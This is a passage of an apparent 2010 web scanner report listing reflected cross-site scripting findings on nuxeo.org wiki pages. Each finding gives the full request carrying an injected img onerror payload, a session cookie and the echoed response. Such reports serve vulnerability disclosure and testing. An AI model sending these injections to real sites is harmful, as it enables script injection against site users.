Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13071
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaa677fb915a'>Ajax4JSF Good practicesbbc96<img src=a onerror=alert(1)>aa677fb915a</a>
...[SNIP]...

1.48. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a was submitted in the REST URL parameter 4. This input was echoed as 37093"><img src=a onerror=alert(1)>9c0dc50f03a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main37093%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9c0dc50f03a/AllDocs?format=xar&amp;name=Main37093"><img src=a onerror=alert(1)>9c0dc50f03a.AllDocs&amp;pages=Main37093">
...[SNIP]...

1.49. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e was submitted in the REST URL parameter 4. This input was echoed as a70b0<img src=a onerror=alert(1)>7ba7318d99e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e/AllDocs HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina70b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7ba7318d99e/">Maina70b0<img src=a onerror=alert(1)>7ba7318d99e</a>
...[SNIP]...

1.50. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 was submitted in the REST URL parameter 5. This input was echoed as f07c4<img src=a onerror=alert(1)>404e6f1a573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocsf07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:36:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/AllDocsf07c4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E404e6f1a573'>AllDocsf07c4<img src=a onerror=alert(1)>404e6f1a573</a>
...[SNIP]...

1.51. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/AllDocs

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 was submitted in the REST URL parameter 5. This input was echoed as e77a3"><img src=a onerror=alert(1)>5736c0fdff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/AllDocse77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:35:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/AllDocse77a3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5736c0fdff5?format=xar&amp;name=Main.AllDocse77a3"><img src=a onerror=alert(1)>5736c0fdff5&amp;pages=Main.AllDocse77a3">
...[SNIP]...

1.52. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482 was submitted in the REST URL parameter 4. This input was echoed as a6af0<img src=a onerror=alert(1)>9ae92ff6482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maina6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maina6af0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9ae92ff6482/">Maina6af0<img src=a onerror=alert(1)>9ae92ff6482</a>
...[SNIP]...

1.53. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc was submitted in the REST URL parameter 4. This input was echoed as b9d0b"><img src=a onerror=alert(1)>f559c3eb1fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc/BlogRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb9d0b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef559c3eb1fc/BlogRss?format=xar&amp;name=Mainb9d0b"><img src=a onerror=alert(1)>f559c3eb1fc.BlogRss&amp;pages=Mainb9d0b">
...[SNIP]...

1.54. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 was submitted in the REST URL parameter 5. This input was echoed as b0ae0"><img src=a onerror=alert(1)>7936f7b7411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssb0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BlogRssb0ae0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7936f7b7411?format=xar&amp;name=Main.BlogRssb0ae0"><img src=a onerror=alert(1)>7936f7b7411&amp;pages=Main.BlogRssb0ae0">
...[SNIP]...

1.55. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BlogRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 was submitted in the REST URL parameter 5. This input was echoed as f4e8d<img src=a onerror=alert(1)>30d9f92f005 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BlogRssf4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BlogRssf4e8d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E30d9f92f005'>BlogRssf4e8d<img src=a onerror=alert(1)>30d9f92f005</a>
...[SNIP]...

1.56. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685 was submitted in the REST URL parameter 4. This input was echoed as 4d9ef<img src=a onerror=alert(1)>5eb223d685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:02 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main4d9ef%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5eb223d685/">Main4d9ef<img src=a onerror=alert(1)>5eb223d685</a>
...[SNIP]...

1.57. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b was submitted in the REST URL parameter 4. This input was echoed as d1d8b"><img src=a onerror=alert(1)>619a28fe25b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b/BookAdminMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maind1d8b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E619a28fe25b/BookAdminMoved?format=xar&amp;name=Maind1d8b"><img src=a onerror=alert(1)>619a28fe25b.BookAdminMoved&amp;pages=Maind1d8b">
...[SNIP]...

1.58. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f was submitted in the REST URL parameter 5. This input was echoed as b693d<img src=a onerror=alert(1)>f1870ce447f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedb693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMovedb693d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1870ce447f'>BookAdminMovedb693d<img src=a onerror=alert(1)>f1870ce447f</a>
...[SNIP]...

1.59. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 was submitted in the REST URL parameter 5. This input was echoed as cfca7"><img src=a onerror=alert(1)>92f1ed54814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedcfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookAdminMovedcfca7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E92f1ed54814?format=xar&amp;name=Main.BookAdminMovedcfca7"><img src=a onerror=alert(1)>92f1ed54814&amp;pages=Main.BookAdminMovedcfca7">
...[SNIP]...

1.60. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

